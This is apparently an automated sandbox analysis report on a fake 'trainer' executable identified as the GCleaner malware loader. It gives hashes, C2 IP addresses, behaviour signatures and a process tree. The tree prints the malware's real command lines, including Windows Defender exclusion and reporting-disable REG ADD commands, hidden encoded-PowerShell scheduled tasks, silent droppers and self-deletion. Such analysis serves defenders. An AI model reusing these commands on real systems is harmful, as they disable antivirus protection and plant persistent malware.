Analysis

  • max time kernel
    151s
  • max time network
    154s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20230220-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20230220-enlocale:en-usos:windows10-2004-x64system
  • submitted
    06-04-2023 16:58

General

  • Target

    trainerv_7VxI5OpA.exe

  • Size

    4.3MB

  • MD5

    3a0c3723ddc9efd1b7d584e10312576b

  • SHA1

    c695283f4205420f3d9812a6c4b7eb1f4b484063

  • SHA256

    f3dbe218bac2da1fabff8364428a0548f03e2c93442082d2c0ed1b2686040e32

  • SHA512

    b6a645802e9b90e6a0eda5e40e7b48dea2c80c76f59640b50c27c72e78115e31fd161ab98401740a0404382dddcf4d543ff99746bd68363dac61817a3e54e0d2

  • SSDEEP

    98304:QcPNiPea8mdie9Ohxt1rqaAA6YHxkjWvCK90w4LlY/+IbFEmFusXct:xNiPezmdie9MxtgdA6YHuWvB90wklq+V

Malware Config

Extracted

Family

gcleaner

C2

85.31.45.39

85.31.45.250

85.31.45.251

85.31.45.88

Signatures

  • GCleaner

    GCleaner is a Pay-Per-Install malware loader first discovered in early 2019.

  • Blocklisted process makes network request 1 IoCs
  • Downloads MZ/PE file
  • Checks BIOS information in registry 2 TTPs 2 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 3 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 16 IoCs
  • Loads dropped DLL 11 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Checks for any installed AV software in registry 1 TTPs 10 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Drops Chrome extension 1 IoCs
  • Drops desktop.ini file(s) 1 IoCs
  • Drops file in System32 directory 27 IoCs
  • Drops file in Program Files directory 64 IoCs
  • Drops file in Windows directory 4 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 56 IoCs
  • Creates scheduled task(s) 1 TTPs 11 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Enumerates system info in registry 2 TTPs 7 IoCs
  • Kills process with taskkill 1 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Modifies registry class 1 IoCs
  • Runs net.exe
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 5 IoCs
  • Suspicious use of FindShellTrayWindow 4 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\trainerv_7VxI5OpA.exe
    "C:\Users\Admin\AppData\Local\Temp\trainerv_7VxI5OpA.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2120
    • C:\Users\Admin\AppData\Local\Temp\is-1V717.tmp\is-2JTDB.tmp
      "C:\Users\Admin\AppData\Local\Temp\is-1V717.tmp\is-2JTDB.tmp" /SL4 $A0044 "C:\Users\Admin\AppData\Local\Temp\trainerv_7VxI5OpA.exe" 4258240 51712
      2⤵
      • Executes dropped EXE
      • Loads dropped DLL
      • Drops file in Program Files directory
      • Suspicious use of WriteProcessMemory
      PID:268
      • C:\Windows\SysWOW64\net.exe
        "C:\Windows\system32\net.exe" helpmsg 31
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:1612
        • C:\Windows\SysWOW64\net1.exe
          C:\Windows\system32\net1 helpmsg 31
          4⤵
            PID:2584
        • C:\Program Files (x86)\CR DBF\CR_DBF.exe
          "C:\Program Files (x86)\CR DBF\CR_DBF.exe"
          3⤵
          • Executes dropped EXE
          PID:4892
          • C:\Windows\SysWOW64\WerFault.exe
            C:\Windows\SysWOW64\WerFault.exe -u -p 4892 -s 868
            4⤵
            • Program crash
            PID:3556
          • C:\Windows\SysWOW64\WerFault.exe
            C:\Windows\SysWOW64\WerFault.exe -u -p 4892 -s 908
            4⤵
            • Program crash
            PID:4724
          • C:\Windows\SysWOW64\WerFault.exe
            C:\Windows\SysWOW64\WerFault.exe -u -p 4892 -s 1080
            4⤵
            • Program crash
            PID:4032
          • C:\Windows\SysWOW64\WerFault.exe
            C:\Windows\SysWOW64\WerFault.exe -u -p 4892 -s 140
            4⤵
            • Program crash
            PID:3224
        • C:\Windows\SysWOW64\net.exe
          "C:\Windows\system32\net.exe" pause ImageComparer45
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:1532
          • C:\Windows\SysWOW64\net1.exe
            C:\Windows\system32\net1 pause ImageComparer45
            4⤵
              PID:3228
          • C:\Program Files (x86)\CR DBF\CR_DBF.exe
            "C:\Program Files (x86)\CR DBF\CR_DBF.exe" 0eb237d1d48855f4296a6c8a5ffe762e
            3⤵
            • Executes dropped EXE
            • Checks for any installed AV software in registry
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of WriteProcessMemory
            PID:2624
            • C:\Windows\SysWOW64\WerFault.exe
              C:\Windows\SysWOW64\WerFault.exe -u -p 2624 -s 860
              4⤵
              • Program crash
              PID:4268
            • C:\Windows\SysWOW64\WerFault.exe
              C:\Windows\SysWOW64\WerFault.exe -u -p 2624 -s 868
              4⤵
              • Program crash
              PID:3488
            • C:\Windows\SysWOW64\WerFault.exe
              C:\Windows\SysWOW64\WerFault.exe -u -p 2624 -s 984
              4⤵
              • Program crash
              PID:452
            • C:\Windows\SysWOW64\WerFault.exe
              C:\Windows\SysWOW64\WerFault.exe -u -p 2624 -s 1052
              4⤵
              • Program crash
              PID:512
            • C:\Windows\SysWOW64\WerFault.exe
              C:\Windows\SysWOW64\WerFault.exe -u -p 2624 -s 1072
              4⤵
              • Program crash
              PID:5012
            • C:\Windows\SysWOW64\WerFault.exe
              C:\Windows\SysWOW64\WerFault.exe -u -p 2624 -s 1108
              4⤵
              • Program crash
              PID:3572
            • C:\Windows\SysWOW64\WerFault.exe
              C:\Windows\SysWOW64\WerFault.exe -u -p 2624 -s 1112
              4⤵
              • Program crash
              PID:1668
            • C:\Windows\SysWOW64\WerFault.exe
              C:\Windows\SysWOW64\WerFault.exe -u -p 2624 -s 1296
              4⤵
              • Program crash
              PID:4348
            • C:\Windows\SysWOW64\WerFault.exe
              C:\Windows\SysWOW64\WerFault.exe -u -p 2624 -s 1304
              4⤵
              • Program crash
              PID:2964
            • C:\Windows\SysWOW64\WerFault.exe
              C:\Windows\SysWOW64\WerFault.exe -u -p 2624 -s 1000
              4⤵
              • Program crash
              PID:4636
            • C:\Windows\SysWOW64\WerFault.exe
              C:\Windows\SysWOW64\WerFault.exe -u -p 2624 -s 1268
              4⤵
              • Program crash
              PID:1208
            • C:\Windows\SysWOW64\WerFault.exe
              C:\Windows\SysWOW64\WerFault.exe -u -p 2624 -s 1448
              4⤵
              • Program crash
              PID:1612
            • C:\Windows\SysWOW64\WerFault.exe
              C:\Windows\SysWOW64\WerFault.exe -u -p 2624 -s 1680
              4⤵
              • Program crash
              PID:3444
            • C:\Windows\SysWOW64\WerFault.exe
              C:\Windows\SysWOW64\WerFault.exe -u -p 2624 -s 996
              4⤵
              • Program crash
              PID:4852
            • C:\Windows\SysWOW64\WerFault.exe
              C:\Windows\SysWOW64\WerFault.exe -u -p 2624 -s 1432
              4⤵
              • Program crash
              PID:4824
            • C:\Windows\SysWOW64\WerFault.exe
              C:\Windows\SysWOW64\WerFault.exe -u -p 2624 -s 1816
              4⤵
              • Program crash
              PID:1712
            • C:\Windows\SysWOW64\WerFault.exe
              C:\Windows\SysWOW64\WerFault.exe -u -p 2624 -s 1084
              4⤵
              • Program crash
              PID:2184
            • C:\Windows\SysWOW64\WerFault.exe
              C:\Windows\SysWOW64\WerFault.exe -u -p 2624 -s 2088
              4⤵
              • Program crash
              PID:3448
            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://setupservice.xyz/eyJ0eXBlIjoxLCJ0Ijo4OTgxNTA4OTgxMjk2NCwibmFtZSI6InRyYWluZXIudi4xLjAuemlwIiwic2lkIjoiMjYwMTc2NzQifQ==
              4⤵
              • Enumerates system info in registry
              • Modifies registry class
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
              • Suspicious use of FindShellTrayWindow
              • Suspicious use of WriteProcessMemory
              PID:1972
              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xb0,0x108,0x7ffa022646f8,0x7ffa02264708,0x7ffa02264718
                5⤵
                  PID:2076
                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2128,1988062898178023369,3250368363904634863,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2172 /prefetch:2
                  5⤵
                    PID:1624
                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2128,1988062898178023369,3250368363904634863,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2452 /prefetch:3
                    5⤵
                    • Suspicious behavior: EnumeratesProcesses
                    PID:5048
                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2128,1988062898178023369,3250368363904634863,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2752 /prefetch:8
                    5⤵
                      PID:2500
                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,1988062898178023369,3250368363904634863,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3400 /prefetch:1
                      5⤵
                        PID:1724
                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,1988062898178023369,3250368363904634863,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3416 /prefetch:1
                        5⤵
                          PID:4876
                        • C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
                          "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2128,1988062898178023369,3250368363904634863,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5708 /prefetch:8
                          5⤵
                            PID:2168
                          • C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe
                            "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --configure-user-settings --verbose-logging --system-level --msedge --force-configure-user-settings
                            5⤵
                            • Drops file in Program Files directory
                            PID:1888
                            • C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe
                              "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\TEMP\MsEdgeCrashpad --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x220,0x224,0x228,0x1fc,0x22c,0x7ff605dd5460,0x7ff605dd5470,0x7ff605dd5480
                              6⤵
                                PID:1704
                            • C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
                              "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2128,1988062898178023369,3250368363904634863,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5708 /prefetch:8
                              5⤵
                              • Suspicious behavior: EnumeratesProcesses
                              PID:1528
                          • C:\Windows\SysWOW64\WerFault.exe
                            C:\Windows\SysWOW64\WerFault.exe -u -p 2624 -s 1792
                            4⤵
                            • Program crash
                            PID:544
                          • C:\Windows\SysWOW64\WerFault.exe
                            C:\Windows\SysWOW64\WerFault.exe -u -p 2624 -s 1748
                            4⤵
                            • Program crash
                            PID:2072
                          • C:\Windows\SysWOW64\WerFault.exe
                            C:\Windows\SysWOW64\WerFault.exe -u -p 2624 -s 1960
                            4⤵
                            • Program crash
                            PID:2164
                          • C:\Windows\SysWOW64\WerFault.exe
                            C:\Windows\SysWOW64\WerFault.exe -u -p 2624 -s 2088
                            4⤵
                            • Program crash
                            PID:3920
                          • C:\Windows\SysWOW64\WerFault.exe
                            C:\Windows\SysWOW64\WerFault.exe -u -p 2624 -s 1292
                            4⤵
                            • Program crash
                            PID:5084
                          • C:\Windows\SysWOW64\WerFault.exe
                            C:\Windows\SysWOW64\WerFault.exe -u -p 2624 -s 1956
                            4⤵
                            • Program crash
                            PID:2684
                          • C:\Windows\SysWOW64\WerFault.exe
                            C:\Windows\SysWOW64\WerFault.exe -u -p 2624 -s 1956
                            4⤵
                            • Program crash
                            PID:1160
                          • C:\Windows\SysWOW64\WerFault.exe
                            C:\Windows\SysWOW64\WerFault.exe -u -p 2624 -s 1824
                            4⤵
                            • Program crash
                            PID:2584
                          • C:\Windows\SysWOW64\WerFault.exe
                            C:\Windows\SysWOW64\WerFault.exe -u -p 2624 -s 1440
                            4⤵
                            • Program crash
                            PID:1712
                          • C:\Windows\SysWOW64\WerFault.exe
                            C:\Windows\SysWOW64\WerFault.exe -u -p 2624 -s 1900
                            4⤵
                            • Program crash
                            PID:560
                          • C:\Windows\SysWOW64\WerFault.exe
                            C:\Windows\SysWOW64\WerFault.exe -u -p 2624 -s 1824
                            4⤵
                            • Program crash
                            PID:2492
                          • C:\Windows\SysWOW64\WerFault.exe
                            C:\Windows\SysWOW64\WerFault.exe -u -p 2624 -s 1972
                            4⤵
                            • Program crash
                            PID:4996
                          • C:\Windows\SysWOW64\WerFault.exe
                            C:\Windows\SysWOW64\WerFault.exe -u -p 2624 -s 1976
                            4⤵
                            • Program crash
                            PID:3372
                          • C:\Windows\SysWOW64\WerFault.exe
                            C:\Windows\SysWOW64\WerFault.exe -u -p 2624 -s 1328
                            4⤵
                            • Program crash
                            PID:2072
                          • C:\Users\Admin\AppData\Local\Temp\7SHGjwyP\7xRKT9ADbPaHwyd.exe
                            C:\Users\Admin\AppData\Local\Temp\7SHGjwyP\7xRKT9ADbPaHwyd.exe /VERYSILENT
                            4⤵
                            • Executes dropped EXE
                            PID:1348
                            • C:\Users\Admin\AppData\Local\Temp\is-HPCNP.tmp\is-7GJA9.tmp
                              "C:\Users\Admin\AppData\Local\Temp\is-HPCNP.tmp\is-7GJA9.tmp" /SL4 $4027E "C:\Users\Admin\AppData\Local\Temp\7SHGjwyP\7xRKT9ADbPaHwyd.exe" 2215905 52736 /VERYSILENT
                              5⤵
                              • Executes dropped EXE
                              • Loads dropped DLL
                              • Drops file in Program Files directory
                              PID:3268
                              • C:\Windows\SysWOW64\net.exe
                                "C:\Windows\system32\net.exe" helpmsg 9
                                6⤵
                                  PID:2584
                                  • C:\Windows\SysWOW64\net1.exe
                                    C:\Windows\system32\net1 helpmsg 9
                                    7⤵
                                      PID:2716
                                  • C:\Program Files (x86)\Zerkalo 1.5\Zerkalo331.exe
                                    "C:\Program Files (x86)\Zerkalo 1.5\Zerkalo331.exe" install
                                    6⤵
                                    • Executes dropped EXE
                                    PID:1712
                                  • C:\Program Files (x86)\Zerkalo 1.5\Zerkalo331.exe
                                    "C:\Program Files (x86)\Zerkalo 1.5\Zerkalo331.exe" start
                                    6⤵
                                    • Executes dropped EXE
                                    PID:5464
                                  • C:\Windows\SysWOW64\net.exe
                                    "C:\Windows\system32\net.exe" pause Zerkalo331
                                    6⤵
                                      PID:5456
                                      • C:\Windows\SysWOW64\net1.exe
                                        C:\Windows\system32\net1 pause Zerkalo331
                                        7⤵
                                          PID:5708
                                  • C:\Windows\SysWOW64\WerFault.exe
                                    C:\Windows\SysWOW64\WerFault.exe -u -p 2624 -s 1896
                                    4⤵
                                    • Program crash
                                    PID:4016
                                  • C:\Users\Admin\AppData\Local\Temp\cmXwtlLI\iIng49SBYSID87KcW.exe
                                    C:\Users\Admin\AppData\Local\Temp\cmXwtlLI\iIng49SBYSID87KcW.exe /m SUB=0eb237d1d48855f4296a6c8a5ffe762e
                                    4⤵
                                    • Executes dropped EXE
                                    PID:1060
                                    • C:\Users\Admin\AppData\Local\Temp\is-H937U.tmp\is-B3S2A.tmp
                                      "C:\Users\Admin\AppData\Local\Temp\is-H937U.tmp\is-B3S2A.tmp" /SL4 $202B4 "C:\Users\Admin\AppData\Local\Temp\cmXwtlLI\iIng49SBYSID87KcW.exe" 1337110 52736 /m SUB=0eb237d1d48855f4296a6c8a5ffe762e
                                      5⤵
                                      • Executes dropped EXE
                                      • Loads dropped DLL
                                      PID:2436
                                      • C:\Users\Admin\AppData\Local\Temp\is-JNLGM.tmp\FileDate46\FileDate46.exe
                                        "C:\Users\Admin\AppData\Local\Temp\is-JNLGM.tmp\FileDate46\FileDate46.exe" /m SUB=0eb237d1d48855f4296a6c8a5ffe762e
                                        6⤵
                                        • Checks computer location settings
                                        • Executes dropped EXE
                                        PID:520
                                        • C:\Windows\SysWOW64\cmd.exe
                                          "C:\Windows\System32\cmd.exe" /c taskkill /im "FileDate46.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\is-JNLGM.tmp\FileDate46\FileDate46.exe" & exit
                                          7⤵
                                            PID:5136
                                            • C:\Windows\SysWOW64\taskkill.exe
                                              taskkill /im "FileDate46.exe" /f
                                              8⤵
                                              • Kills process with taskkill
                                              • Suspicious use of AdjustPrivilegeToken
                                              PID:5284
                                        • C:\Windows\SysWOW64\net.exe
                                          "C:\Windows\system32\net.exe" helpmsg 26
                                          6⤵
                                            PID:4772
                                            • C:\Windows\SysWOW64\net1.exe
                                              C:\Windows\system32\net1 helpmsg 26
                                              7⤵
                                                PID:5548
                                        • C:\Windows\SysWOW64\WerFault.exe
                                          C:\Windows\SysWOW64\WerFault.exe -u -p 2624 -s 2164
                                          4⤵
                                          • Program crash
                                          PID:4088
                                        • C:\Users\Admin\AppData\Local\Temp\OnWR6gkI\XBf2h.exe
                                          C:\Users\Admin\AppData\Local\Temp\OnWR6gkI\XBf2h.exe
                                          4⤵
                                          • Executes dropped EXE
                                          PID:5360
                                          • C:\Users\Admin\AppData\Local\Temp\is-783DQ.tmp\is-U55FV.tmp
                                            "C:\Users\Admin\AppData\Local\Temp\is-783DQ.tmp\is-U55FV.tmp" /SL4 $202FA "C:\Users\Admin\AppData\Local\Temp\OnWR6gkI\XBf2h.exe" 1803256 48640
                                            5⤵
                                            • Executes dropped EXE
                                            • Loads dropped DLL
                                            • Drops file in Program Files directory
                                            PID:5556
                                            • C:\Program Files (x86)\BTngBackup\SyncBackupShell.exe
                                              "C:\Program Files (x86)\BTngBackup\SyncBackupShell.exe"
                                              6⤵
                                              • Executes dropped EXE
                                              • Drops file in Program Files directory
                                              PID:6052
                                        • C:\Windows\SysWOW64\WerFault.exe
                                          C:\Windows\SysWOW64\WerFault.exe -u -p 2624 -s 840
                                          4⤵
                                          • Program crash
                                          PID:5604
                                        • C:\Windows\SysWOW64\WerFault.exe
                                          C:\Windows\SysWOW64\WerFault.exe -u -p 2624 -s 2208
                                          4⤵
                                          • Program crash
                                          PID:5984
                                        • C:\Windows\SysWOW64\WerFault.exe
                                          C:\Windows\SysWOW64\WerFault.exe -u -p 2624 -s 2192
                                          4⤵
                                          • Program crash
                                          PID:6032
                                        • C:\Windows\SysWOW64\WerFault.exe
                                          C:\Windows\SysWOW64\WerFault.exe -u -p 2624 -s 2208
                                          4⤵
                                          • Program crash
                                          PID:6136
                                        • C:\Users\Admin\AppData\Local\Temp\bGChaH0N\c7t9uOY6.exe
                                          C:\Users\Admin\AppData\Local\Temp\bGChaH0N\c7t9uOY6.exe /S /site_id=690689
                                          4⤵
                                          • Checks BIOS information in registry
                                          • Checks computer location settings
                                          • Executes dropped EXE
                                          • Drops file in System32 directory
                                          • Enumerates system info in registry
                                          PID:5196
                                          • C:\Windows\SysWOW64\forfiles.exe
                                            "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"
                                            5⤵
                                              PID:4384
                                              • C:\Windows\SysWOW64\cmd.exe
                                                /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&
                                                6⤵
                                                  PID:816
                                                  • \??\c:\windows\SysWOW64\reg.exe
                                                    REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64
                                                    7⤵
                                                      PID:5428
                                                    • \??\c:\windows\SysWOW64\reg.exe
                                                      REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32
                                                      7⤵
                                                        PID:5396
                                                  • C:\Windows\SysWOW64\forfiles.exe
                                                    "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"
                                                    5⤵
                                                      PID:3652
                                                      • C:\Windows\SysWOW64\cmd.exe
                                                        /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&
                                                        6⤵
                                                          PID:5404
                                                          • \??\c:\windows\SysWOW64\reg.exe
                                                            REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64
                                                            7⤵
                                                              PID:5576
                                                            • \??\c:\windows\SysWOW64\reg.exe
                                                              REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32
                                                              7⤵
                                                                PID:5416
                                                          • C:\Windows\SysWOW64\schtasks.exe
                                                            schtasks /run /I /tn "gUylsBiSX"
                                                            5⤵
                                                              PID:5812
                                                            • C:\Windows\SysWOW64\schtasks.exe
                                                              schtasks /CREATE /TN "gUylsBiSX" /SC once /ST 02:49:16 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
                                                              5⤵
                                                              • Creates scheduled task(s)
                                                              PID:5724
                                                            • C:\Windows\SysWOW64\schtasks.exe
                                                              schtasks /DELETE /F /TN "gUylsBiSX"
                                                              5⤵
                                                                PID:628
                                                              • C:\Windows\SysWOW64\schtasks.exe
                                                                schtasks /CREATE /TN "bIxjpVXoYOizHLMzgM" /SC once /ST 19:01:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\FNhEJkUTaeavwqgvk\dtXVaZYpVgtLOQz\GIVcqKU.exe\" js /site_id 690689 /S" /V1 /F
                                                                5⤵
                                                                • Drops file in Windows directory
                                                                • Creates scheduled task(s)
                                                                PID:6052
                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                              C:\Windows\SysWOW64\WerFault.exe -u -p 2624 -s 1792
                                                              4⤵
                                                              • Program crash
                                                              PID:2096
                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                              C:\Windows\SysWOW64\WerFault.exe -u -p 2624 -s 1844
                                                              4⤵
                                                              • Program crash
                                                              PID:5672
                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                              C:\Windows\SysWOW64\WerFault.exe -u -p 2624 -s 840
                                                              4⤵
                                                              • Program crash
                                                              PID:5768
                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                              C:\Windows\SysWOW64\WerFault.exe -u -p 2624 -s 1860
                                                              4⤵
                                                              • Program crash
                                                              PID:5892
                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                              C:\Windows\SysWOW64\WerFault.exe -u -p 2624 -s 1924
                                                              4⤵
                                                              • Program crash
                                                              PID:5936
                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                              C:\Windows\SysWOW64\WerFault.exe -u -p 2624 -s 2132
                                                              4⤵
                                                              • Program crash
                                                              PID:3416
                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                              C:\Windows\SysWOW64\WerFault.exe -u -p 2624 -s 1960
                                                              4⤵
                                                              • Program crash
                                                              PID:5600
                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                              C:\Windows\SysWOW64\WerFault.exe -u -p 2624 -s 2116
                                                              4⤵
                                                              • Program crash
                                                              PID:5332
                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                              C:\Windows\SysWOW64\WerFault.exe -u -p 2624 -s 1920
                                                              4⤵
                                                              • Program crash
                                                              PID:5012
                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                              C:\Windows\SysWOW64\WerFault.exe -u -p 2624 -s 1292
                                                              4⤵
                                                              • Program crash
                                                              PID:624
                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                              C:\Windows\SysWOW64\WerFault.exe -u -p 2624 -s 1872
                                                              4⤵
                                                              • Program crash
                                                              PID:636
                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                              C:\Windows\SysWOW64\WerFault.exe -u -p 2624 -s 840
                                                              4⤵
                                                              • Program crash
                                                              PID:4936
                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                              C:\Windows\SysWOW64\WerFault.exe -u -p 2624 -s 1748
                                                              4⤵
                                                              • Program crash
                                                              PID:5228
                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                              C:\Windows\SysWOW64\WerFault.exe -u -p 2624 -s 140
                                                              4⤵
                                                              • Program crash
                                                              PID:3368
                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                        C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 4892 -ip 4892
                                                        1⤵
                                                          PID:2672
                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                          C:\Windows\SysWOW64\WerFault.exe -pss -s 516 -p 4892 -ip 4892
                                                          1⤵
                                                            PID:4824
                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                            C:\Windows\SysWOW64\WerFault.exe -pss -s 480 -p 4892 -ip 4892
                                                            1⤵
                                                              PID:3372
                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                              C:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 4892 -ip 4892
                                                              1⤵
                                                                PID:2076
                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                C:\Windows\SysWOW64\WerFault.exe -pss -s 452 -p 2624 -ip 2624
                                                                1⤵
                                                                  PID:776
                                                                • C:\Windows\SysWOW64\WerFault.exe
